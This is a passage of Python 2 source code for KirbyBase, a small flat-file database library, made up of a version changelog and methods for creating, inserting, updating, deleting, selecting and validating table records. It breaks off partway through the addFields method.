2004-06-22: Version 1.6 released.
-On numeric comparisons, you can now specify negative numbers.
-Fixed a bug where program would crash if you had a space between
the comparison operator and the number in numeric comparisons in
select statement.
-You can select all records by specifying that you want to match
'recno' against '*'.
-Got rid of the last eval in the code.
-Modest speed improvement by checking for strings that need to be
     encoded first instead of just encoding all strings.
-Added a compatibility layer for declaring field types when
creating a table. If you use the new compatible field types when
creating a table, you can use the table either from the Python or
Ruby version of KirbyBase without having to change anything.
-Changed the record-counter and deleted-records-counter in the
header record of the table to be zero padded instead of spaces
padded.
2005-01-30: Version 1.7 released.
-***IMPORTANT***
Changed the default value for the keyword argument 'useRegExp' to
be false instead of true. This means that, when doing a update,
delete, or select, records being selected on string fields will
be matched using exact matching instead of regular expression
matching. If you want to do regular expression matching, pass
'useRegExp = True' to the method.
-Added a new public method called validate. Calling this method
with a table name will check each record of that table and
validate that all of the fields have values of the correct type.
This can be used to validate data you have put into the table by
means other than through KirbyBase, perhaps by opening the table
in a text editor and typing in information.
-Fixed a bug in _closeTable where if an exception occurred it was
blowing up because the variable 'name' did not exist.
-Fixed a bug in _writeRecord where if an exception occured it was
blowing up because the variable 'name' did not exist.
-Fixed a bug in _getMatches where I was referencing
self.field_names as a method instead of as a dictionary.
-Added a keyword argument to select() called returnType. If set to
'object', the result list returned will contain Record objects
where each field name is an attribute of the object, so you could
refer to a record's field as plane.speed instead of plane[4]. If
set to 'dict', the result list returned will contain dictionaries
where each key is a field name and each value is a field value.
If set to 'list', the default, the result is a list of lists.
-Added a new method, insertBatch. It allows you to insert multiple
records at one time into a table.
-Added a new private method, _strToBool, that converts string
values like 'True' to boolean values.
-Added a new private method, _convertInput, and moved to it the
code that ensures that the data on an insert is in proper list
format. I did this so that I did not have duplicate code in both
the insert and insertBatch methods.
    -To accommodate the fact that users can now send a large batch of
records to be inserted, I changed _sendSocket so that it first
sends the length of the database command to the server, then it
actually sends the command itself, which can now be any length.
-Changed the code in _getMatches to precompile the regular
expression pattern instead of dynamically compiling every time the
pattern is compared to a table record. This should speed up
queries a little bit.
-Changed the code in select that converts table fields back to
their native types to be more efficient.
-Changed _sendSocket to use StringIO (actually cStringIO) to hold
the result set of a client/server-based query instead of just
capturing the result by concatenating records to one big string.
In informal testing on large result sets, it shaves a few tenths
of a second off the query time.
2005-01-31: Version 1.7.1 released.
-Fixed a nasty bug in _getMatches. If useRegExp was True and the
select was against multiple string fields, the code was only
using one of the input patterns to search on instead of using all
of them.
2005-02-20: Version 1.8 released.
******** IMPORTANT - Method Interface Changes ****************
-Added the ability to sort the result set of a select by multiple
fields and to specify whether each field should be sorted
ascending or descending. This necessitated a change to the
interface of the select method. I moved the position of sortField
in the argument list and also changed it to be a list instead of a
string. I also changed the name of sortField to sortFields. I
     also moved sortDesc in the argument list and also made it a list.
******************************************************************
-Added another allowable value, 'report', to the keyword
parameter, returnType in the select method. This returns the
result set in a pretty print format. Along with this, added
another keyword parameter called rptSettings to the select method.
This is only used if rptType is 'report'. It is a 2 element list.
The first element specifies the number of records to print on a
page. The second element is boolean specifying whether to print
a dashed line between records.
-Added ability to pass field values to update and insert using an
object with attributes set equal to the field names.
-Fixed a bug in _getMatches. If a field of type int or float had
a blank value in the table (i.e. ''), the code was attempting to
convert it to it's proper type (i.e. int or float) before
doing the match comparison. This would cause an exception to
occur. Now, if the field is an int,float,date or datetime and it
is blank, I convert it to None. This allows the numeric
comparisons to work correctly for null fields.
-Fixed a bug in select. If a field in the result set was equal
to '', I was letting it stay that way, when I should really be
converting it to None before returning the result set.
-Cleaned up the internals a bit. Mainly, I tried to use functions
in the operator module like lt and ge instead of hardcoding < and
>= in an if statement.
2005-04-26: Version 1.8.1 released.
-Added the ability to select, update, delete multiple records by
specifying a list of record numbers.
-Cleaned up the internals of _getMatchesByRecno by not splitting
the record line into fields if user is selecting all records, and
by using a generator to return matches instead of building a list
of matches and returning the whole list.
2005-05-03: Version 1.8.2 released.
    -Emergency bug-fix release: Fred Pacquier's eagle eyes spotted a bug
     I introduced in version 1.8.1. It's in _getMatchByRecno. If you
are selecting all records, KirbyBase is not getting rid of the
newline character attached to the last field of the record.
Thanks Fred Pacquier!
2005-09-19: Version 1.9 released.
-Fixed a bug that can occur on very fast machines when sending data
between the client and the server. Thanks to David Edwards for
this fix.
    -Added a method, setDefaultReturnType, that allows you to set the
default return type of results from the select method. The default
is still 'list', but you can set it to 'list', 'object', or 'dict'.
Thanks to David Edwards for this suggested enhancement.
-Added methods addFields and dropFields. These allow you to add new
columns to a table and remove existing columns from the table.
Thanks to Pierre Quentel for the code for these two enhancements.
"""
import re
import socket
import os.path
import datetime
import cPickle
import cStringIO
import operator
import tempfile
import shutil
#--------------------------------------------------------------------------
# KirbyBase Class
#--------------------------------------------------------------------------
class KirbyBase:
"""Database Management System.
Public Methods:
__init__ - Create an instance of database.
close - Close database.
create - Create a table.
insert - Insert a record into a table.
insertBatch - Insert a list of records into a table.
update - Update a table.
delete - Delete record(s) from a table.
select - select record(s) from a table.
pack - remove deleted records from a table.
validate - validate data in table records.
drop - Remove a table.
getFieldNames - Get a list of a table's field names.
getFieldTypes - Get a list of a table's field types.
addFields - Insert new column(s) into table.
dropFields - Remove column(s) from table.
len - Total number of records in table.
setDefaultReturnType - Set the default return type for selects.
"""
#----------------------------------------------------------------------
# PUBLIC METHODS
#----------------------------------------------------------------------
#----------------------------------------------------------------------
# init
#----------------------------------------------------------------------
def __init__(self, type='local', host=None, port=None):
"""Create an instance of the database and return a reference to it.
Keyword Arguments:
type - Connection type: local(default), client, or server.
host - IP address of server to connect to, if connection type
is client.
port - Port number of server to connect to, if connection type
is client.
"""
self.connect_type = type
# Regular expression used to determine if field needs to be
# encoded.
self.encodeRegExp = re.compile(r'\n|\r|\032|\|')
# Regular expression used to determine if field needs to be
# un-encoded.
self.unencodeRegExp = re.compile(
r'&linefeed;|&carriage_return;|&substitute;|&pipe;')
# This will be used to validate the select statements.
self.cmpFuncs = {"<":operator.lt, "<=":operator.le,
">=":operator.ge, ">":operator.gt, "==":operator.eq,
"!=":operator.ne, "<>":operator.ne}
# This will be used to validate and convert the field types in
# the header rec of the table into valid python types.
self.strToTypes = {'int':int, 'Integer':int, 'float':float,
'Float':float, 'datetime.date':datetime.date,
'Date':datetime.date, 'datetime.datetime':datetime.datetime,
'DateTime':datetime.datetime, 'bool':bool, 'Boolean':bool,
'str':str, 'String':str}
# If connecting as client, open a socket connection with server.
if self.connect_type == 'client':
self.host, self.port = host, port
# Default select return type to list.
self.def_return_type = 'list'
#----------------------------------------------------------------------
# close
#----------------------------------------------------------------------
def close(self):
"""Close connection to database server.
"""
if self.connect_type == 'client':
self.dbSock.close()
#----------------------------------------------------------------------
# create
#----------------------------------------------------------------------
def create(self, name, fields):
"""Create a new table and return True on success.
Arguments:
name - physical filename, including path, that will hold
table.
fields - list holding strings made up of multiple fieldname,
fieldtype pairs (i.e. ['plane:str','speed:int']).
Valid fieldtypes are: str, int, float, datetime.date,
datetime.datetime, bool or, for compatibility with
the Ruby version of KirbyBase use String, Integer,
Float, Date, DateTime, and Boolean.
Returns True if no exceptions are raised.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.create('%s',%s)" %(name,fields))
# Check to see if file already exists.
if os.path.exists(name):
raise KBError(name + ' already exists!')
# Validate field types. Integer, String, Float, Date, DateTime, and
# Boolean types are compatible between the Ruby and Python versions
# of KirbyBase.
for x in [y.split(':')[1] for y in fields]:
if x not in self.strToTypes:
raise KBError('Invalid field type: %s' % x)
# Make copy of fields list so that value passed in is not changed.
# Add recno counter, delete counter, and recno field definition at
# beginning.
header_rec = list(['000000','000000','recno:int'] + fields)
# Open the table in write mode since we are creating it new, write
# the header record to it and close it.
fptr = self._openTable(name, 'w')
fptr.write('|'.join(header_rec) + '\n')
self._closeTable(fptr)
# Return success.
return True
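    # Hedged example (file name illustrative): the Ruby-compatible type
    # names described above work the same way as the native ones, e.g.
    #
    #   db.create('plane.tbl',
    #             ['name:String', 'speed:Integer', 'first_flown:Date'])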
#----------------------------------------------------------------------
# insert
#----------------------------------------------------------------------
def insert(self, name, values):
"""Insert a new record into table, return unique record number.
Arguments:
name - physical file name, including path, that holds table.
values - list, dictionary, or object containing field values
of new record.
Returns unique record number assigned to new record when it is
created.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
            # I put this code in when I added the ability to use a record
# object for the values argument. The problem was that, if the
# user specified a record object, things worked ok in embedded
# mode. However, in client/server mode, I could not figure out
# a good way to send the record object to the server because it
# is embedded in a string representation of the database
# command (i.e. "db.insert('plane', recordObject)"). So, what
# I did to get it working was, I check to see if values is a
# record object. If it is, I grab the object's internal
# dictionary (__dict__) that holds all of the attributes and I
# send this as part of the expression string, instead of
# sending the object itself.
if not isinstance(values, (list, dict)):
return self._sendSocket("db.insert('%s',%s)" %(name,
values.__dict__))
else:
return self._sendSocket("db.insert('%s',%s)" %(name,values))
# Open the table.
fptr = self._openTable(name, 'r+')
# Update the instance variables holding table header info
self._updateHeaderVars(fptr)
# If values is a dictionary or an object, we are going to convert
# it into a list. That way, we can use the same validation and
# updating routines regardless of whether the user passed in a
# dictionary, an object, or a list. This returns a copy of
# values so that we are not messing with the original values.
record = self._convertInput(values)
# Check input fields to make sure they are valid.
self._validateUpdateCriteria(record, self.field_names[1:])
try:
# Get a new record number.
rec_no = self._incrRecnoCounter(fptr)
# Add record number to front of record.
record.insert(0, rec_no)
# Append the new record to the end of the table and close the
# table. Run each field through encoder to take care of
# special characters.
self._writeRecord(fptr, 'end', '|'.join(map(self._encodeString,
[str(item) for item in record])))
finally:
self._closeTable(fptr)
# Return the unique record number created for this new record.
return rec_no
#----------------------------------------------------------------------
# insertBatch
#----------------------------------------------------------------------
def insertBatch(self, name, batchRecords):
"""Insert a batch of records into table, return a list of rec #s.
Arguments:
name - physical file name, including path, that holds
table.
batchRecords - list of records. Each record can be a list, a
dictionary, or an object containing field values
of new record.
Returns list of unique record numbers assigned.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.insertBatch('%s',%s)" %(name,
batchRecords))
# Open the table, update the instance variables holding table
# header info and close table.
fptr = self._openTable(name, 'r')
self._updateHeaderVars(fptr)
self._closeTable(fptr)
# Create an empty list to hold the batch after it has been
# validated and any records within it that are in dictionary format
# have been converted to list format.
records = []
for values in batchRecords:
# If values is a dictionary or an object, we are going to
# convert it into a list. That way, we can use the same
# validation and updating routines regardless of whether the
# user passed in a dictionary, an object, or a list. This
# returns a copy of values so that we are not messing with the
# original values.
record = self._convertInput(values)
# Check input fields to make sure they are valid.
self._validateUpdateCriteria(record, self.field_names[1:])
# Add the validated (and possibly converted) record to the
# records list.
records.append(record)
# Create empty list to hold new record numbers.
rec_nos = []
# Open the table again, this time in read-write mode.
fptr = self._openTable(name, 'r+')
try:
# Now that the batch has been validated, add it to the database
# table.
for record in records:
# Get a new record number.
rec_no = self._incrRecnoCounter(fptr)
# Add record number to front of record.
record.insert(0, rec_no)
# Append the new record to the end of the table. Run each
# field through encoder to take care of special characters.
self._writeRecord(fptr, 'end', '|'.join(
map(self._encodeString, [str(item) for item in record])))
                # Add the newly created record number to the list that
                # we return back to the user.
rec_nos.append(rec_no)
finally:
self._closeTable(fptr)
# Return the unique record number created for this new record.
return rec_nos
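    # Hedged example (field values assumed from the module docstring):
    # a batch may freely mix lists and dictionaries, and one call returns
    # all of the new record numbers:
    #
    #   db.insertBatch('plane.tbl', [
    #       ['B-17', 'USA', 287, 2000],
    #       {'name': 'Spitfire', 'country': 'UK', 'speed': 370,
    #        'range': 1135}])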
#----------------------------------------------------------------------
# update
#----------------------------------------------------------------------
def update(self, name, fields, searchData, updates, filter=None,
useRegExp=False):
"""Update record(s) in table, return number of records updated.
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to search on. If
any of the items in this list is 'recno', then the
table will be searched by the recno field only and
will update, at most, one record, since recno is
the system generated primary key.
searchData - list containing actual data to search on. Each
item in list corresponds to item in the 'fields'
list.
updates - list, dictionary, or object containing actual data
to put into table field. If it is a list and
'filter' list is empty or equal to None, then
updates list must have a value for each field in
table record.
filter - only used if 'updates' is a list. This is a
list containing names of fields to update. Each
item in list corresponds to item in the 'updates'
list. If 'filter' list is empty or equal to None,
and 'updates' is a list, then 'updates' list must
have an item for each field in table record,
excepting the recno field.
useRegExp - if true, match string fields using regular
expressions, else match string fields using
                     strict equality (i.e. '=='). Defaults to False.
Returns integer specifying number of records that were updated.
Example:
db.update('plane.tbl',['country','speed'],['USA','>400'],
[1230],['range'])
This will search for any plane from the USA with a speed
        greater than 400mph and update its range to 1230 miles.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
            # I put this code in when I added the ability to use a record
# object for the updates argument. The problem was that, if the
# user specified a record object, things worked ok in embedded
# mode. However, in client/server mode, I could not figure out
# a good way to send the record object to the server because it
# is embedded in a string representation of the database
# command (i.e. "db.update('plane', ['recno'], [45],
# recordObject)"). So, what I did to get it working was, I
# check to see if updates is a record object. If it is, I grab
# the object's internal dictionary (__dict__) that holds all of
# the attributes and I send this as part of the expression
# string, instead of sending the object itself.
if not isinstance(updates, (list, dict)):
return self._sendSocket("db.update('%s',%s,%s,%s,%s,%s)"
%(name, fields, searchData, updates.__dict__, filter,
useRegExp))
else:
return self._sendSocket("db.update('%s',%s,%s,%s,%s,%s)"
%(name, fields, searchData, updates, filter, useRegExp))
# Make copy of searchData list so that value passed in is not
# changed if I edit it in validateMatchCriteria.
patterns = list(searchData)
# Open the table.
fptr = self._openTable(name, 'r+')
# Update the instance variables holding table header info.
self._updateHeaderVars(fptr)
        # An update filter is only allowed when 'updates' is a list;
        # dictionaries and objects carry their own field names, so
        # supplying a separate filter with them is an error (checked
        # below).
if filter:
if isinstance(updates, list):
pass
# If updates is a dictionary, user cannot specify a filter,
# because the keys of the dictionary will function as the
# filter.
elif isinstance(updates, dict):
raise KBError('Cannot specify filter when updates is a ' +
'dictionary.')
else:
raise KBError('Cannot specify filter when updates is an ' +
'object.')
else:
# If updates is a list and no update filter
# fields were specified, that means user wants to update
# all fields in record, so we set the filter list equal
# to the list of field names of table, excluding the recno
# field, since user is not allowed to update recno field.
if isinstance(updates, list): filter = self.field_names[1:]
# If updates is a list, do nothing because it is already in the
# proper format and filter has either been supplied by the user
# or populated above.
if isinstance(updates, list): pass
# If updates is a dictionary, we are going to convert it into an
# updates list and a filters list. This will allow us to use the
# same routines for validation and updating.
elif isinstance(updates, dict):
filter = [k for k in updates.keys() if k in
self.field_names[1:]]
updates = [updates[i] for i in filter]
# If updates is an object, we are going to convert it into an
# updates list and a filters list. This will allow us to use the
# same routines for validation and updating.
else:
filter = [x for x in self.field_names[1:] if hasattr(updates,x)]
updates = [getattr(updates,x) for x in self.field_names[1:] if
hasattr(updates,x)]
try:
# Check input arguments to make sure they are valid.
self._validateMatchCriteria(fields, patterns)
self._validateUpdateCriteria(updates, filter)
except KBError:
# If something didn't check out, close the table and re-raise
# the error.
fptr.close()
raise
# Search the table and populate the match list.
match_list = self._getMatches(fptr, fields, patterns, useRegExp)
# Create a list with each member being a list made up of a
# fieldname and the corresponding update value, converted to a
# safe string.
filter_updates = zip(filter,
[self._encodeString(str(u)) for u in updates])
updated = 0
# Step through the match list.
for line, fpos in match_list:
# Create a copy of the current record.
new_record = line.strip().split('|')
# For each filter field, apply the updated value to the
# table record.
for field, update in filter_updates:
new_record[self.field_names.index(field)] = update
# Convert the updated record back into a text line so we
# can write it back out to the file.
new_line = '|'.join(new_record)
# Since we are changing the current record, we will first
# write over it with all blank spaces in the file.
self._deleteRecord(fptr, fpos, line)
# If the updated copy of the record is not bigger than the
# old copy, then we can just write it in the same spot in
# the file. If it is bigger, then we will have to append
# it to the end of the file.
if len(new_line) > len(line):
self._writeRecord(fptr, 'end', new_line)
# If we didn't overwrite the current record, that means
                # we have another blank record (i.e. deleted record) out
# there, so we need to increment the deleted records
# counter.
self._incrDeleteCounter(fptr)
else:
self._writeRecord(fptr, fpos, new_line)
updated+=1
# Close the table.
self._closeTable(fptr)
# Return the number of records updated.
return updated
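    # Hedged example (values assumed): when updates is a dictionary, its
    # keys act as the filter, so no separate filter list is given:
    #
    #   db.update('plane.tbl', ['name'], ['P-51'],
    #             {'speed': 437, 'range': 1650})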
#----------------------------------------------------------------------
# delete
#----------------------------------------------------------------------
def delete(self, name, fields, searchData, useRegExp=False):
"""Delete record(s) from table, return number of records deleted.
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to search on. if
any of the items in this list is 'recno', then the
table will be searched by the recno field only and
will delete, at most, one record, since recno is
the system generated primary key.
searchData - list containing actual data to search on. Each
item in list corresponds to item in the 'fields'
list.
useRegExp - if true, match string fields using regular
expressions, else match string fields using
                         strict equality (i.e. '=='). Defaults to False.
Returns integer specifying number of records that were deleted.
Example:
db.delete('plane.tbl',['country','speed'],['USA','>400'])
This will search for any plane from the USA with a speed
greater than 400mph and delete it.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.delete('%s',%s,%s,%s)"
%(name,fields, searchData, useRegExp))
# Make copy of searchData list so that value passed in is not
# changed if I edit it in validateMatchCriteria.
patterns = list(searchData)
# Open the table.
fptr = self._openTable(name, 'r+')
# Update the instance variables holding table header info.
self._updateHeaderVars(fptr)
try:
# Check input arguments to make sure they are valid.
self._validateMatchCriteria(fields, patterns)
except KBError:
# If something didn't check out, close the table and re-raise
# the error.
fptr.close()
raise
# Search the table and populate the match list.
match_list = self._getMatches(fptr, fields, patterns, useRegExp)
deleted = 0
# Delete any matches found.
for line, fpos in match_list:
self._deleteRecord(fptr, fpos, line)
# Increment the delete counter.
self._incrDeleteCounter(fptr)
deleted+=1
# Close the table.
self._closeTable(fptr)
# Return the number of records deleted.
return deleted
#----------------------------------------------------------------------
# select
#----------------------------------------------------------------------
def select(self, name, fields, searchData, filter=None,
useRegExp=False, sortFields=[], sortDesc=[], returnType=None,
rptSettings=[0,False]):
"""Select record(s) from table, return list of records selected.
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to search on.
If any of the items in this list is 'recno',
then the table will be searched by the recno
field only and will select, at most, one record,
since recno is the system generated primary key.
searchData - list containing actual data to search on. Each
item in list corresponds to item in the
'fields' list.
filter - list containing names of fields to include for
selected records. If 'filter' list is empty or
equal to None, then all fields will be included
in result set.
useRegExp - if true, match string fields using regular
expressions, else match string fields using
strict equality (i.e. '=='). Defaults to False.
sortFields - list of fieldnames to sort on. Each must be a
valid field name, and, if filter list is not
empty, the same fieldname must be in the filter
list. Result set will be sorted in the same
order as fields appear in sortFields in
ascending order unless the same field name also
appears in sortDesc, then they will be sorted in
descending order.
sortDesc - list of fieldnames that you want to sort result
set by in descending order. Each field name
must also be in sortFields.
returnType - a string specifying the type of the items in the
returned list. Can be 'list' (items are lists
of values), 'dict' (items are dictionaries with
keys = field names and values = matching
values), 'object' (items = instances of the
generic Record class) or 'report' (result set
is formatted as a table with a header, suitable
for printing). Defaults to None. If None, the
instance variable def_return_type will be used.
rptSettings - a list with two elements. This is only used if
returnType is 'report'. The first element
specifies the number of records to print on each
page. The default is 0, which means do not do
any page breaks. The second element is a
boolean specifying whether to print a row
separator (a line of dashes) between each
record. The default is False.
Returns list of records matching selection criteria.
Example:
db.select('plane.tbl',['country','speed'],['USA','>400'])
This will search for any plane from the USA with a speed
greater than 400mph and return it.
"""
# Check returnType argument to make sure it is either 'list',
# 'dict', or 'object'.
if returnType not in [None, 'list', 'dict', 'object', 'report']:
raise KBError('Invalid return type: %s' % returnType)
# If user did not specify a return type, use whatever the default
# return type is set to.
if returnType == None:
returnType = self.def_return_type
        # Check rptSettings list to make sure its items are valid.
if type(rptSettings[0]) != int:
raise KBError('Invalid report setting: %s' % rptSettings[0])
if type(rptSettings[1]) != bool:
raise KBError('Invalid report setting: %s' % rptSettings[1])
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket(
"db.select('%s',%s,%s,%s,%s,%s,%s,'%s',%s)"
%(name, fields, searchData, filter, useRegExp, sortFields,
sortDesc, returnType, rptSettings))
# Make copy of searchData list so that value passed in is not
# changed if I edit it in validateMatchCriteria.
patterns = list(searchData)
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Update the instance variables holding table header info.
self._updateHeaderVars(fptr)
try:
# Check input arguments to make sure they are valid.
self._validateMatchCriteria(fields, patterns)
if filter: self._validateFilter(filter)
else: filter = self.field_names
except KBError:
# If something didn't check out, close the table and re-raise
# the error.
fptr.close()
raise
# Validate sort field argument. It needs to be one of the field
# names included in the filter.
for field in [sf for sf in sortFields if sf not in filter]:
raise KBError('Invalid sort field specified: %s' % field)
# Make sure any fields specified in sort descending list are also
# in sort fields list.
for field in [sf for sf in sortDesc if sf not in sortFields]:
raise KBError('Cannot specify a field to sort in descending ' +
'order if you have not specified that field as a sort field')
# Search table and populate match list.
match_list = self._getMatches(fptr, fields, patterns, useRegExp)
# Initialize result set.
result_set = []
# Get a list of filter field indexes (i.e., where in the
# table record is the field that the filter item is
        # referring to).
filterIndeces = [self.field_names.index(x) for x in filter]
# For each record in match list, add it to the result set.
for record, fpos in match_list:
# Initialize a record to hold the filtered fields of
# the record.
result_rec = []
            # Split the record line into its fields.
fields = record.split('|')
# Step through each field index in the filter list. Grab the
# result field at that position, convert it to
# proper type, and put it in result set.
for i in filterIndeces:
# If the field is empty, just append it to the result rec.
if fields[i] == '':
result_rec.append(None)
# Otherwise, convert field to its proper type before
# appending it to the result record.
else:
result_rec.append(
self.convert_types_functions[i](fields[i]))
# Add the result record to the result set.
result_set.append(result_rec)
# Close the table.
self._closeTable(fptr)
# If a sort field was specified...
# I stole the following code from Steve Lucy. I got it from the
# ASPN Python Cookbook webpages. Thanks Steve!
if len(sortFields) > 0:
reversedSortFields = list(sortFields)
reversedSortFields.reverse()
for sortField in reversedSortFields:
i = filter.index(sortField)
result_set.sort( lambda x,y:
cmp(*[(x[i], y[i]), (y[i], x[i])]
[sortField in sortDesc]))
# If returnType is 'object', then convert each result record
# to a Record object before returning the result list.
if returnType == 'object':
return [Record(filter, rec) for rec in result_set]
# If returnType is 'dict', then convert each result record to
# a dictionary with the keys being the field names before returning
# the result list.
elif returnType == 'dict':
return [dict(zip(filter, rec)) for rec in result_set]
# If returnType is 'report', then return a pretty print version of
# the result set.
elif returnType == 'report':
# How many records before a formfeed.
numRecsPerPage = rptSettings[0]
# Put a line of dashes between each record?
rowSeparator = rptSettings[1]
delim = ' | '
# columns of physical rows
columns = apply(zip, [filter] + result_set)
# get the maximum of each column by the string length of its
# items
maxWidths = [max([len(str(item)) for item in column])
for column in columns]
# Create a string of dashes the width of the print out.
rowDashes = '-' * (sum(maxWidths) + len(delim)*
(len(maxWidths)-1))
# select the appropriate justify method
justifyDict = {str:str.ljust,int:str.rjust,float:str.rjust,
bool:str.ljust,datetime.date:str.ljust,
datetime.datetime:str.ljust}
# Create a string that holds the header that will print.
headerLine = delim.join([justifyDict[fieldType](item,width)
for item,width,fieldType in zip(filter,maxWidths,
self.field_types)])
# Create a StringIO to hold the print out.
output=cStringIO.StringIO()
# Variable to hold how many records have been printed on the
# current page.
recsOnPageCount = 0
# For each row of the result set, print that row.
for row in result_set:
# If top of page, print the header and a dashed line.
if recsOnPageCount == 0:
print >> output, headerLine
print >> output, rowDashes
# Print a record.
print >> output, delim.join([justifyDict[fieldType](
str(item),width) for item,width,fieldType in
zip(row,maxWidths,self.field_types)])
# If rowSeparator is True, print a dashed line.
if rowSeparator: print >> output, rowDashes
# Add one to the number of records printed so far on
# the current page.
recsOnPageCount += 1
# If the user wants page breaks and you have printed
# enough records on this page, print a form feed and
# reset records printed variable.
if numRecsPerPage > 0 and (recsOnPageCount ==
numRecsPerPage):
print >> output, '\f',
recsOnPageCount = 0
# Return the contents of the StringIO.
return output.getvalue()
# Otherwise, just return the list of lists.
else:
return result_set
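    # Hedged example (table contents assumed): a printable report, 20
    # records per page with dashed row separators, is requested with:
    #
    #   print db.select('plane.tbl', ['recno'], ['*'],
    #                   returnType='report', rptSettings=[20, True])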
#----------------------------------------------------------------------
# pack
#----------------------------------------------------------------------
def pack(self, name):
"""Remove blank records from table and return total removed.
Keyword Arguments:
name - physical file name, including path, that holds table.
Returns number of blank lines removed from table.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.pack('%s')" %(name))
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Read in all records.
lines = fptr.readlines()
# Close the table so we can re-build it.
self._closeTable(fptr)
# Reset number of deleted records to zero.
header_rec = lines[0].split('|')
header_rec[1] = "000000"
# Set first line of re-built file to the header record.
lines[0] = '|'.join(header_rec)
# Open the table in write mode since we will be re-building it.
fptr = self._openTable(name, 'w')
# This is the counter we will use to report back how many blank
# records were removed.
lines_deleted = 0
# Step through all records in table, only writing out non-blank
# records.
for line in lines:
# By doing a rstrip instead of a strip, we can remove any
# extra spaces at the end of line that were a result of
# updating a record with a shorter one.
line = line.rstrip()
if line == "":
lines_deleted += 1
continue
try:
fptr.write(line + '\n')
except:
raise KBError('Could not write record in: ' + name)
# Close the table.
self._closeTable(fptr)
# Return number of records removed from table.
return lines_deleted
#----------------------------------------------------------------------
# validate
#----------------------------------------------------------------------
def validate(self, name):
"""Validate all records have field values of proper data type.
Keyword Arguments:
name - physical file name, including path, that holds table.
Returns list of records that have invalid data.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.validate('%s')" %(name))
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Update the instance variables holding table header info
self._updateHeaderVars(fptr)
# Create list to hold any invalid records that are found.
invalid_list = []
# Loop through all records in the table.
for line in fptr:
# Strip off newline character and any trailing spaces.
line = line[:-1].strip()
# If blank line, skip this record.
if line == "": continue
# Split the line up into fields.
record = line.split("|")
# Check the value of recno to see if the value is
# greater than the last recno assigned. If it is,
# add this to the invalid record list.
if self.last_recno < int(record[0]):
invalid_list.append([record[0], 'recno', record[0]])
# For each field in the record check to see if you
# can convert it to the field type specified in the
# header record by using the conversion function
# specified in self.convert_types_functions.
# If you can't convert it, add the
# record number, the field name, and the offending
# field value to the list of invalid records.
for i, item in enumerate(record):
if item == '': continue
try:
if self.convert_types_functions[i](item): pass
except:
invalid_list.append([record[0], self.field_names[i],
item])
# Close the table.
self._closeTable(fptr)
# Return list of invalid records.
return invalid_list
#----------------------------------------------------------------------
# drop
#----------------------------------------------------------------------
def drop(self, name):
"""Delete physical file containing table and return True.
Arguments:
name - physical filename, including path, that holds table.
Returns True if no exceptions are raised.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.drop('%s')" %(name))
# Delete physical file.
os.remove(name)
# Return success.
return True
#----------------------------------------------------------------------
# getFieldNames
#----------------------------------------------------------------------
def getFieldNames(self, name):
"""Return list of field names for specified table name
Arguments:
name - physical file name, including path, that holds table.
Returns list of field names for table.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.getFieldNames('%s')" %(name))
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Update the instance variables holding table header info
self._updateHeaderVars(fptr)
# Close the table.
self._closeTable(fptr)
return self.field_names
#----------------------------------------------------------------------
# getFieldTypes
#----------------------------------------------------------------------
def getFieldTypes(self, name):
"""Return list of field types for specified table name
Arguments:
name - physical file name, including path, that holds table.
Returns list of field types for table.
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.getFieldTypes('%s')" %(name))
# Open the table in read-only mode since we won't be updating it.
fptr = self._openTable(name, 'r')
# Update the instance variables holding table header info
self._updateHeaderVars(fptr)
# Close the table.
self._closeTable(fptr)
return self.field_types
#----------------------------------------------------------------------
# addFields
#----------------------------------------------------------------------
def addFields(self, name, fields, after = ''):
"""Modify the table to insert new fields after the specified field,
or at the beginning if after is None
Arguments:
name - physical file name, including path, that holds
table.
fields - list containing names of fields to insert.
after - name of the field after which the new fields
will be inserted, or empty string to insert at
the beginning of the record
A temporary file is created, then copied into the old file
"""
# If running as a client, then send the command to the server for
# it to execute.
if self.connect_type == 'client':
return self._sendSocket("db.addFields('%s',%s,'%s')" %(name,
fields,after))
# Validate field types
for x in [y.split(':')[1] for y in fields]:
if x not in self.strToTypes:
raise KBError('Invalid field type: %s' % x)
# Validate the field given in "after"
field_names = self.getFieldNames(name)
if after and after not in field_names:
raise KBError('Invalid field name: %s' % after)
# index to insert the new fields
if not after:
insert_after = 0
else:
insert_after = field_names.index(after)
# build the modified fields list
old_fields = zip(field_names,self.getFieldTypes(name))
new_fields = []
for (n,t) in old_fields[1:]:
if t.__name__ in ['date','datetime']:
new_fields.append('%s:datetime.%s' %(n,t.__name__))
else:
new_fields.append('%s:%s' %(n,t.__name__))
new_fields = new_fields[:insert_after]+fields+ \
new_fields[insert_after:]
# Use tempfile to get a unique name for a temporary file
# to insert the records of the modified table
temp_file=tempfile.NamedTemporaryFile()
temp_name=temp_file.name
temp_file.close()
# Recreate the header line to go into the temp file.
header_rec = list(['%06d' % self.last_recno,
'%06d' % self.del_counter, 'recno:int'] + new_fields)
# copy old table into temporary one
in_file = open(name,'r')
in_file.readline() # skip first line
out_file = open(temp_name,'a')
# Write header rec to new file.
out_file.write('|'.join(header_rec) + '\n')
blank = ['']*len(fields)
# build the new file faster than with selects from old file
# and inserts in new one
for line in in_file:
recs = line[:-1].split('|')
recs = recs[:insert_after+1]+blank+recs[insert_after+1:]
